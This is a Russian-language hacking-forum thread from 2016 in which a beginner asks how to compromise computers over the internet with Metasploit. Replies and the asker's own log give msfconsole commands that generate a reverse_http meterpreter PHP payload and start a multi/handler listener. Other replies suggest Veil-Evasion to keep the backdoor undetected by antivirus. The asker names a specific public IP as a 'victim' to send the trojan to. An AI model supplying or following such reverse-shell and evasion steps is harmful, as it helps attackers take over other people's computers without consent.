ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.01.2016, 12:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
8563
Репутация:
0
|
|
Прошу не судить строга и не кидать камни, только учусь!
Недавно познакомился с metasploit и с Exploit.
exploit/windows/smb/ms08_067_netapi для Windows XP хорошо подходит.
Больший интерес привлекexploit/multi/handler т.к он позволяет проникнуть через троян по определенному порту в локальной сети.
Что требуется и в чем вопрос?!
Хочу найти подобный эксплойт этому который функционирует в ИНТЕРНЕТ сети.
Какой эксплойт лучше использовать для таких нужд ?
Где копать информацию по нужному exploit?
Код:
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ***.***.*.*
set LPORT ****
exploit
Буду очень благодарен за информацию по данной теме!
Знания по metasploit, armitage, cobalt strike в стадии зародыша.
|
|
|
|
13.01.2016, 13:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от Sega
Sega said:
↑
Прошу не судить строга и не кидать камни, только учусь!
Недавно познакомился с metasploit и с Exploit.
exploit/windows/smb/ms08_067_netapi для Windows XP хорошо подходит.
Больший интерес привлекexploit/multi/handler т.к он позволяет проникнуть через троян по определенному порту в локальной сети
.
Что требуется и в чем вопрос?!
Хочу найти подобный эксплойт этому который функционирует в ИНТЕРНЕТ сети.
Какой эксплойт лучше использовать для таких нужд ?
Где копать информацию по нужному exploit?
Код:
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST ***.***.*.*
set LPORT ****
exploit
Буду очень благодарен за информацию по данной теме!
Знания по metasploit, armitage, cobalt strike в стадии зародыша. Генерируете нагрузку, например, таким образом:
Код:
Code:
msf exploit(handler) > use payload/windows/meterpreter/reverse_http
...
generate -f ololo.php -t raw
Соединение принимаете следующим образом:
Код:
Code:
msf payload(reverse_tcp) > use exploit/multi/handler
...
run
Информации по метасплоиту полно в интернете.
|
|
|
|
13.01.2016, 14:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
8563
Репутация:
0
|
|
Сообщение от YaBtr
YaBtr said:
↑
Генерируете нагрузку, например, таким образом:
Код:
Code:
msf exploit(handler) > use payload/windows/meterpreter/reverse_http
...
generate -f ololo.php -t raw
Соединение принимаете следующим образом:
Код:
Code:
msf payload(reverse_tcp) > use exploit/multi/handler
...
run
Информации по метасплоиту полно в интернете.
Код:
Code:
msf exploit(handler) > use exploit/multi/handlerInterrupt: use the 'exit' command to quit
msf exploit(handler) > use payload/windows/meterpreter/reverse_http
msf payload(reverse_http) > set LHOST 192.168.1.28
LHOST => 192.168.1.28
msf payload(reverse_http) > set LPORT 4444
LPORT => 4444
msf payload(reverse_http) > generate -f ololo.php -t raw[*] Writing 324 bytes to ololo.php...
msf payload(reverse_http) > use exploit/multi/handler
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set LHOST 192.168.1.28
LHOST => 192.168.1.28
msf exploit(handler) > run
[*] Started reverse TCP handler on 192.168.1.28:4444[*] Starting the payload handler...
???
Всё тоже самое нужно повторить с атакой на компьютер в другой сети.
Как понимаю для этого используется другой Еxploit.
Наведите на путь истинный.
|
|
|
|
13.01.2016, 15:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Если Вам нужна php-нагрузка для всех ресурсов, то генерируете ее один раз и настраиваете хэндлер на мультиприем.
|
|
|
|
15.01.2016, 02:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
2988
Репутация:
1
|
|
Можно поступить по другому, т.к. создание троя в metasploit палится вирями. Он лучше подойдёт для ловли shell, а создание бэкдора сделай в veil-evasion и не палится и хороший выбор языков
|
|
|
|
24.01.2016, 05:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
8563
Репутация:
0
|
|
veil-evasion
Сообщение от st1x0
st1x0 said:
↑
Можно поступить по другому, т.к. создание троя в metasploit палится вирями. Он лучше подойдёт для ловли shell, а создание бэкдора сделай в veil-evasion и не палится и хороший выбор языков veil-evasion Очень хорошо подходит для конпиляции. Меня интересует способ проникновения, а не компиляция трояна. Мне очень интересен способ и подходящий эксплойт для этого. Тот способ который показан, работает внутри сети, а мне интересен способ который работает по ip адресу в интернет пространстве. |
|
|
|
24.01.2016, 11:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
137056
Репутация:
11
|
|
Сообщение от Sega
Sega said:
↑
veil-evasion
veil-evasion Очень хорошо подходит для конпиляции. Меня интересует способ проникновения, а не компиляция трояна. Мне очень интересен способ и подходящий эксплойт для этого. Тот способ который показан, работает внутри сети, а мне интересен способ который работает по ip адресу в интернет пространстве. Разницы особо нету, только в интернете машины чаще за натом или фаерволом, а системы и баги те же.
|
|
|
|
25.01.2016, 01:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
8563
Репутация:
0
|
|
Сообщение от Sega
Sega said:
↑
veil-evasion
veil-evasion Очень хорошо подходит для конпиляции. Меня интересует способ проникновения, а не компиляция трояна. Мне очень интересен способ и подходящий эксплойт для этого. Тот способ который показан, работает внутри сети, а мне интересен способ который работает по ip адресу в интернет пространстве.
Сообщение от blackbox
blackbox said:
↑
Разницы особо нету, только в интернете машины чаще за натом или фаерволом, а системы и баги те же. Как Вам по подробней описать ситуацию?! Приставим ситуацию!!!
Есть человек с ip адресом: 145.255.181.238 я могу передать этом человеку файл) сделанный с помощью veil-evasion.
Какой exploit лучше использовать и как? Как это примерно выглядит? Что прописывать в show options? Как лучше с компелировать файл через veil-evasion? Очень интересно увидеть процесс запуска эксплойта! Я понимаю это звучит очень глупо.
На компьютере жертвы нет хорошего фаервола и есть возможность его отключить.
|
|
|
|
25.01.2016, 01:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
137056
Репутация:
11
|
|
Сообщение от Sega
Sega said:
↑
Как Вам по подробней описать ситуацию?! Приставим ситуацию!!!
Есть человек с ip адресом: 145.255.181.238 я могу передать этом человеку файл) сделанный с помощью veil-evasion.
Какой exploit лучше использовать и как? Как это примерно выглядит? Что прописывать в show options? Как лучше с компелировать файл через veil-evasion? Очень интересно увидеть процесс запуска эксплойта! Я понимаю это звучит очень глупо.
На компьютере жертвы нет хорошего фаервола и есть возможность его отключить. Я не юзал veil, поэтому посоветовать конкретного ничего не могу. Можно помощь почитать https://github.com/Veil-Framework/Veil-Evasion или видосы посмотреть. Ну я думаю принцип примерно одинаковый - запустить у себя на прослушивание meterpreter а бинарник, зашифрованный вейлом запустить на целевом компьютере и ждать пока произойдет бек-коннект, ну или что там нагрузка должна делать. В ютубе ролики, по идее должны быть. Посмотрите, поинтересуйтесь, я думаю все не так сложно но и с пол-пинка тоже не получится. Успехов!
|
|
|
|
25.01.2016, 01:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
8563
Репутация:
0
|
|
Сообщение от blackbox
blackbox said:
↑
Я не юзал veil, поэтому посоветовать конкретного ничего не могу. Можно помощь почитать
https://github.com/Veil-Framework/Veil-Evasion
или видосы посмотреть. Ну я думаю принцип примерно одинаковый - запустить у себя на прослушивание meterpreter а бинарник, зашифрованный вейлом запустить на целевом компьютере и ждать пока произойдет бек-коннект, ну или что там нагрузка должна делать. В ютубе ролики, по идее должны быть. Посмотрите, поинтересуйтесь, я думаю все не так сложно но и с пол-пинка тоже не получится. Успехов! Спасибо вам огромное за трату времени. Вот подкинули бы вы еще материала чтоб почитать и посмотреть по этой теме!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
